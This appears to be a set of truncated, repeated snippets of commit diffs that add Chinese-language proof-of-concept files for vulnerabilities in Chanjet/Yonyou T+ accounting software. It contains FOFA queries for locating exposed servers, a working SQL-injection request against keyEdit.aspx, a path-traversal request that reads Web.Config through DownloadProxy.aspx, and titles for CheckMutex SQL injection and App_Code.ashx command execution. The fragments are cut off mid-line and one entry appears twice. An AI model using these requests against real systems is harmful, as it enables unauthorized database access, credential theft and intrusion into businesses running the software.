20 changes: 20 additions & 0 deletions 20 用友畅捷通-TPlus-CheckMutex存在sql注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,20 @@ ## 用友畅捷通-TPlus-CheckMutex存在sql注入漏洞 ## fofa ``` app="畅捷通-TPlus" ``` ## poc ``` POST /tplus/ajaxpro...
该漏洞是由于畅捷通T的/tplus/UFAQD/keyEdit.asp接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者可以利用SQL注入漏洞获取数据库中的信息 fofa: app="畅捷通-TPlus" POC: GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1User-Agent: Mozill...
该系统存在任意文件读取漏洞 CVE编号: CNNVD编号: CNVD编号: 3.影响版本 畅捷通T+ http://www.uu.com.cn/m/message?download=1 (二维码自动识别) 4.fofa查询语句 app="畅捷通-TPlus" 5.漏洞复现 漏洞链接:http://127.0.0.1/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config 漏洞数据...
36 changes: 36 additions & 0 deletions 36 畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞.md Original file line numberDiff line numberDiff line change@@ -0,0 +1,36 @@ ## 畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞## fofa ```
19 changes: 19 additions & 0 deletions 19 用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,19 @@ ## 用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞 ## fofa ``` app="畅捷通-TPlus" ``` ## poc ``` GET...
20 changes: 20 additions & 0 deletions 20 用友畅捷通-TPlus-CheckMutex存在sql注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,20 @@ ## 用友畅捷通-TPlus-CheckMutex存在sql注入漏洞 ## fofa ``` app="畅捷通-TPlus" ``` ## poc ``` POST /tplus/ajaxpro...